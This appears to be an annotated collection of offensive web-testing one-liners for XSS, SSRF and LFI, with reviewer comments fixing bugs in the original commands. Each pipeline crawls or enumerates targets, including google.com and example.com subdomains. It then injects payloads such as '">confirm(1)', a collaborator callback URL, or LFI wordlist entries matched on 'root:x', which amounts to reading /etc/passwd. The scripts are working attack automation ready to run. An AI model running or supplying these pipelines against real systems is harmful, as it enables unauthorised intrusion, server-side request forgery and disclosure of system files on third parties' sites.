One-line scripts
XSS
# Crawl every URL listed in targets_urls.txt with gospider (-c 10 / -d 5 are presumably
# concurrency and crawl depth — confirm against gospider's help), skipping static assets via
# --blacklist, keep only output lines tagged "code-200", print the 5th whitespace-separated
# field (assumed to be the URL — verify against gospider's line format), keep URLs that have a
# query string, let qsreplace -a rewrite the parameter values, hand the list to dalfox in pipe
# mode, and mirror dalfox's output into result.txt.
# NOTE(review): the "." in the --blacklist pattern is unescaped, so it matches any character
# rather than a literal dot; "\." would match only the extension separator.
gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee result.txt
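# Take the URLs in bofeb.txt that carry a query string, drop static-asset URLs by extension,
# replace every parameter value with the probe string '">confirm(1)' (qsreplace), save that
# list to combinedfuzz.json, then fetch each URL and report whether the probe comes back
# verbatim in the response body.
# Fixes vs. the original one-liner: the extension regex had a stray space and "s vg" (so it
# excluded nothing), "egrep" is deprecated, the loop read without -r and into two variables
# ("read host do"), and "echo" without -e printed the colour escapes literally.
# Note: a verbatim reflection only marks the URL as a candidate for review, not a confirmed
# finding — context, encoding and CSP still decide whether anything executes.
grep "=" bofeb.txt \
  | grep -Eiv '\.(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)' \
  | qsreplace '">confirm(1)' \
  | tee combinedfuzz.json \
  && while IFS= read -r host; do
    # --insecure disables TLS certificate validation; --path-as-is sends the path unnormalised.
    if curl --silent --path-as-is --insecure "$host" | grep -qs "confirm(1)"; then
      printf '%s \033[0;31mVulnerable\033[0m\n' "$host"
    else
      printf '%s \033[0;32mNot Vulnerable\033[0m\n' "$host"
    fi
  done < combinedfuzz.json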
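# Pull archived URLs for testphp.vulnweb.com from waybackurls (copy kept in testphp1.txt),
# keep those with a query string, drop static-asset URLs by extension, replace every parameter
# value with the probe string '">confirm(1)', save that list to combinedfuzz.json, then fetch
# each URL and report whether the probe is reflected verbatim in the response body.
# Fixes vs. the original one-liner: the extension regex had a stray space and "s vg" (so it
# excluded nothing), "egrep" is deprecated, the loop read without -r and into two variables
# ("read host do"), and "echo" without -e printed the colour escapes literally.
# Note: a verbatim reflection only marks the URL as a candidate for review, not a confirmed
# finding — context, encoding and CSP still decide whether anything executes.
waybackurls testphp.vulnweb.com \
  | tee testphp1.txt \
  | grep "=" \
  | grep -Eiv '\.(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)' \
  | qsreplace '">confirm(1)' \
  | tee combinedfuzz.json \
  && while IFS= read -r host; do
    # --insecure disables TLS certificate validation; --path-as-is sends the path unnormalised.
    if curl --silent --path-as-is --insecure "$host" | grep -qs "confirm(1)"; then
      printf '%s \033[0;31mVulnerable\033[0m\n' "$host"
    else
      printf '%s \033[0;32mNot Vulnerable\033[0m\n' "$host"
    fi
  done < combinedfuzz.json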
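# Crawl https://google.com with hakrawler (-subs), append the discovered URLs to google.txt,
# keep those with a query string, drop static-asset URLs by extension, replace every parameter
# value with the probe string '">confirm(1)', save that list to combinedfuzz.json, then fetch
# each URL and report whether the probe is reflected verbatim in the response body.
# Fixes vs. the original one-liner: ">> google.txt | cat google.txt" sent hakrawler's output
# to the file only, so "cat" raced the crawler and read an empty or partial file — "tee -a"
# writes the file and keeps the data flowing; the extension regex had a stray space and
# "s vg" (so it excluded nothing); "egrep" is deprecated; the loop read without -r and into
# two variables ("read host do"); "echo" without -e printed the colour escapes literally.
# Note: a verbatim reflection only marks the URL as a candidate for review, not a confirmed
# finding — context, encoding and CSP still decide whether anything executes.
printf '%s\n' https://google.com \
  | hakrawler -subs \
  | tee -a google.txt \
  | grep "=" \
  | grep -Eiv '\.(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)' \
  | qsreplace '">confirm(1)' \
  | tee combinedfuzz.json \
  && while IFS= read -r host; do
    # --insecure disables TLS certificate validation; --path-as-is sends the path unnormalised.
    if curl --silent --path-as-is --insecure "$host" | grep -qs "confirm(1)"; then
      printf '%s \033[0;31mVulnerable\033[0m\n' "$host"
    else
      printf '%s \033[0;32mNot Vulnerable\033[0m\n' "$host"
    fi
  done < combinedfuzz.json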
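# Filter file.txt through "gf xss", keep URLs whose query contains "source=", replace every
# parameter value with the probe string '">confirm(1)', fetch each URL and print it in red
# when the probe is reflected verbatim in the response body (non-reflecting URLs are silent,
# as in the original).
# Fixes vs. the original one-liner: it had been pasted through a word processor — curly
# quotes, en-dashes instead of "--", and the backslashes of "\033" / "\n" were dropped, so
# it would not run as written; the loop also read without -r and into two variables
# ("read host do").
# Note: a verbatim reflection only marks the URL as a candidate for review, not a confirmed
# finding — context, encoding and CSP still decide whether anything executes.
gf xss < file.txt \
  | grep 'source=' \
  | qsreplace '">confirm(1)' \
  | while IFS= read -r host; do
    # --insecure disables TLS certificate validation; --path-as-is sends the path unnormalised.
    if curl --silent --path-as-is --insecure "$host" | grep -qs "confirm(1)"; then
      printf '%s \033[0;31mVulnerable\033[0m\n' "$host"
    fi
  done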
SSRF
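# Enumerate subdomains of example.com (findomain -q prints bare names), keep the ones that
# answer HTTP (httpx, 1000 concurrent probes), pull their archived URLs with gau, keep URLs
# that have a query string, and rewrite every parameter value to the collaborator URL.
# "YOUR.burpcollaborator.net" is a placeholder for your own out-of-band listener host.
# This line only prints the rewritten URLs; nothing here issues the requests.
# Fix vs. the original one-liner: the grep pattern used curly quotes (“=”), which made grep
# look for the literal characters “=” instead of "=".
findomain -t example.com -q \
  | httpx -silent -threads 1000 \
  | gau \
  | grep "=" \
  | qsreplace http://YOUR.burpcollaborator.net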
LFI
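# Enumerate subdomains of example.com, pull their archived URLs with waybackurls, keep the
# ones "gf lfi" flags, replace every parameter value with the ffuf keyword FUZZ, and run ffuf
# against each URL with ~/wordlist/LFI.txt, reporting responses that match the regex
# "root:x" (-mr).
# Fixes vs. the original one-liner: "$url" was unquoted (word-splitting and globbing on URLs
# containing "?", "*" or spaces), "read" lacked -r (backslashes in URLs were interpreted),
# and the -mr argument used curly quotes, which ffuf would have received as part of the regex.
findomain -t example.com -q \
  | waybackurls \
  | gf lfi \
  | qsreplace FUZZ \
  | while IFS= read -r url; do
    ffuf -u "$url" -mr "root:x" -w ~/wordlist/LFI.txt
  done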